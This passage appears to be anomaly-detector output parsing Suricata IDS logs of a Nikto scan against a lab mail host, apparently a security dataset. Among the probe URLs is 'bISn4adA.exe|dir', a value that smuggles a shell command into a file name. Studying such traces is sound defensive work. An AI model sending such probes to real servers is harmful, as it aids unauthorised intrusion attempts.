"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46916, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1437349444244092, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80", "/parser/model/time": 1583349514.318931, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46918, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.319109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46918, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2026627547191976, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80", "/parser/model/time": 1583349514.321065, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46920, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.exe|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.321278, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46920, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783528103273160, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80", "/parser/model/time": 1583349514.324976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46922, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.325456, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", 